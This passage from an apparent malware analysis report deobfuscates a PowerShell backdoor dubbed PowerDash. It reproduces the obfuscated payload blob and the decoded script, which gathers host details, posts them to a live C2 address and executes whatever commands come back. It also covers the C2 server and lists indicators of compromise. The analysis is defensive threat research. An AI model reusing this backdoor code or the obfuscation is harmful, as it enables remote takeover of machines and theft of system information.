${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${#)``} + ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``%} + ${@}${~*(}${~*(}${#)``} +${@}${``}${;!@}+${@}${.#=}${``} + ${@}${~*(}${[*}${~*(}+${@}${~*(}${~*(}${[*} +${@}${~*(}${``%}${~*(}+ ${@}${[)$}${#+} +${@}${#)``}${~*(} +${@}${[)$}${#+}+ ${@}${#+}${'}+ ${@}${~*(}${~*(}${[*} + ${@}${~*(}${~*(}${[*} + ${@}${~*(}${``%}${.#=} +${@}${~*(}${``%}${;!@}+${@}${#+}${#+} + ${@}${#+}${'}+${@}${~*(}${~*(}${#)``}+ ${@}${~*(}${``%}${;!@}+ ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+ ${@}${``}${'} +${@}${~*(}${``%}${#)``}+${@}${~*(}${~*(}${;!@} + ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%} +${@}${;!@}${#+} + ${@}${[)$}${[*}+ ${@}${#+}${#+} +${@}${~*(}${``%}${``} + ${@}${#+}${'} + ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${;!@}+ ${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${#)``}+${@}${#)``}${~*(}+ ${@}${~*(}${~*(}${'}+ ${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${[*}+${@}${``}${;!@}+${@}${;!@}${#)``}+ ${@}${[)$}${#+}+${@}${~*(}${[*}${;!@} +${@}${~*(}${[)$}+ ${@}${~*(}${``%}+ ${@}${[)$}${#)``}+ ${@}${~*(}${~*(}${``} +${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${;!@} + ${@}${~*(}${~*(}${[*}+ ${@}${~*(}${~*(}${~*(} +${@}${~*(}${~*(}${``%} + ${@}${~*(}${~*(}${;!@} +${@}${~*(}${``%}${~*(} +${@}${[)$}${[*} +${@}${#)``}${~*(}+ ${@}${[)$}${[*} +${@}${'}${[)$} +${@}${~*(}${~*(}${#+}+${@}${~*(}${~*(}${``}+ ${@}${[)$}${[*}+ ${@}${[)$}${#)``} +${@}${~*(}${~*(}${'}+ ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${.#=} +${@}${[)$}${[*} + ${@}${``}${;!@} +${@}${'}${'}+ ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${``} +${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${``%}+${@}${[)$}${[*}+ ${@}${.#=}${``%}+${@}${~*(}${~*(}${~*(}+ ${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${#)``}+ ${@}${[)$}${[*} +${@}${``}${;!@}+${@}${'}${[*} +${@}${~*(}${``%}${~*(}+ ${@}${#+}${'} + ${@}${~*(}${``%}${``%}+ ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${;!@} + ${@}${[)$}${[*}+ ${@}${[)$}${#)``} +${@}${~*(}${``%}${``}+ ${@}${~*(}${``%}${~*(}+ ${@}${#+}${'} +${@}${~*(}${``%}${``%}+${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*} +${@}${``}${;!@} + ${@}${#+}${.#=}+${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${``%} +${@}${~*(}${[*}${~*(} +${@}${[)$}${[*} +${@}${``}${``%} + ${@}${[)$}${#)``} +${@}${#+}${.#=}+ ${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${``%}+${@}${~*(}${[*}${~*(}+${@}${~*(}${[*}${``}+${@}${#)``}${'}+ ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${.#=}+ ${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${#)``}+ ${@}${.#=}${``}+${@}${~*(}${~*(}${~*(}+ ${@}${``}${;!@} +${@}${'}${``} +${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+${@}${``}${~*(} + ${@}${[)$}${[*} + ${@}${``}${;!@} +${@}${.#=}${;!@} +${@}${~*(}${~*(}${;!@} +${@}${~*(}${``%}${~*(}+${@}${#)``}${#)``} +${@}${#+}${'}+${@}${~*(}${~*(}${;!@} + ${@}${~*(}${``%}${;!@}+ ${@}${#+}${#+}+ ${@}${.#=}${``%}+ ${@}${#+}${'} + ${@}${~*(}${~*(}${``}+${@}${~*(}${~*(}${;!@}+${@}${~*(}${``%}${;!@} +${@}${~*(}${~*(}${``%} + ${@}${~*(}${``%}${[)$}+${@}${~*(}${[)$}+${@}${~*(}${``%}+ ${@}${'}${[)$}+ ${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${.#=}+ ${@}${~*(}${~*(}${~*(}+ ${@}${~*(}${``%}${'}+${@}${~*(}${``%}${~*(}+ ${@}${``}${;!@} + ${@}${#)``}${'}+ ${@}${~*(}${~*(}${~*(}+ ${@}${~*(}${``%}${#+}+${@}${~*(}${``%}${#+} + ${@}${#+}${'}+${@}${~*(}${~*(}${``%}+${@}${~*(}${``%}${``%} +${@}${[)$}${[*}+${@}${``}${``%} +${@}${#+}${~*(}+ ${@}${.#=}${[)$}+${@}${#+}${#+}+ ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${[*}+ ${@}${~*(}${~*(}${#)``}+${@}${#)``}${#)``}+ ${@}${~*(}${``%}${.#=} + ${@}${~*(}${~*(}${~*(} + ${@}${#+}${#+} + ${@}${~*(}${``%}${'}+ ${@}${#+}${[)$} +${@}${;!@}${.#=} + ${@}${;!@}${.#=}+ ${@}${#)``}${'}+ ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${~*(}+ ${@}${#+}${'}+ ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${~*(}+${@}${``}${``%}+${@}${``}${``%} + ${@}${[)$}${#)``} + ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${[*}+${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${;!@}+${@}${~*(}${``%}${~*(} +${@}${``}${#)``} +${@}${#)``}${'}+${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``%} +${@}${~*(}${~*(}${#)``}+ ${@}${~*(}${[*}${``}+ ${@}${#)``}${'} +${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${``%} + ${@}${~*(}${~*(}${.#=} +${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${#)``} + ${@}${'}${``%}+${@}${~*(}${~*(}${``}+${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${#+}+ ${@}${``}${;!@}+ ${@}${'}${``}+ ${@}${~*(}${~*(}${;!@} + ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%} +${@}${``}${~*(} + ${@}${``}${#)``}+${@}${#+}${#+}+ ${@}${~*(}${``%}${#+}+${@}${~*(}${``%}${``%}+${@}${``}${~*(}+${@}${``}${~*(} ) " )
With some PowerShell syntax voodoo we were able to format and split the payload into two distinct parts:
- First one, that increasingly builds up a set of variables.
- Second one, that takes these variables, creates a large script chunk and executes it.
Since we can now see that the script is executed using the .
symbol, all that we have to do is replace it with a print statement and execute it in a safe environment.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$url = "https://95.163.240.184:8000/dash/post_data/"
$body = @{
uuid = (Get-WmiObject Win32_ComputerSystemProduct).UUID
name = $env:COMPUTERNAME
os = (Get-WmiObject -Class Win32_OperatingSystem).Caption
lang = (Get-CimInstance CIM_VideoController|%{[int][math]::round($_.AdapterRAM/1GB)}) -join("; ")
domain = (Get-WmiObject -Class Win32_ComputerSystem).Domain
av = (Get-WmiObject -namespace root\SecurityCenter2 -class Antivirusproduct).DisplayName
cpu = (Get-CimInstance CIM_Processor).Name
gpu = (Get-CimInstance CIM_VideoController|%{$_.Name}) -join("; ")
}
$headers = @{'Content-Type'='application/json; charset=utf-8'}
$response = Iwr $url -Method Post -Headers $headers -body ($body|ConvertTo-Json) -UseBasicParsing
Invoke-Command ([ScriptBlock]::Create(($response.Content|ConvertFrom-Json).cmd))
The final payload is relatively small – all it does is collect a bunch of information about the host and then contacts the C2 for commands to execute.
C2 server
We decided to take a closer look at the C2 server.
Luckily for us, the malware operator left the DEBUG mode on.
The server is programmed in Python and uses several known libraries/frameworks like Django and Grappelli.
What's interesting for us is the /dash/
route – that's the endpoint infected bots talk to. We can notice the /dash/post_data/
registration path as well as a few other endpoints that weren't mentioned in previous staged. We suspect that the malware operator manually determines whether the victim is interesting enough and then drops further PowerShell scripts that contain more functionalities.
While we were unable to download any additional payloads that would utilize the other C2 endpoints we plan to monitor this malware family in case a threat actor decides to use it again.
IoC
Value | Description |
---|---|
5.63.152.179 | Host used for serving payloads |
95.163.240.184 | Host used as malware C2 |
hxxps://95.163.240.184:8000/dash/post_data/ | C2 endpoint used for bot registration |
hxxp://5.63.152.179/doc/zal_nr_1_zap_ofert(<digits>).doc | Malicious HTA script |
hxxp://5.63.152.179/pl/1txt/<digits> | Malicious PowerShell script |
hxxp://5.63.152.179/pl/2ht/<digits> | Malicious HTA script |
hxxp://5.63.152.179/pl/3txt/<digits> | Malicious PowerShell script |
d5c03af59492198d99889f5ec84f96129019ba933c5d8e3614866861c28ab4e6 | SHA256 of Zapytanie_ofertowe_2023_0118806.doc |
64502109c546fbd2d37644c030182a906b3871316b5086d31286c3697ca94362 | SHA256 of zal_nr_1_zap_ofert(8806).doc |
2fd5c1a3787eec4d9bd6f935e5b93af0f4fd454544b03c6aa70c94e4b55d22a7 | SHA256 of 8806 – Stager |
ec0a53f40414c1a1419d458af90a74b58d654de4af67841d689fa9f296ca617d | SHA256 of 8806 – HTA persistence |
a196711c42f3f3d378bf8232d3b10a92afd846b0f374cbf6cd54fcfda47b958d | SHA256 of 8806 – PowerDash payload |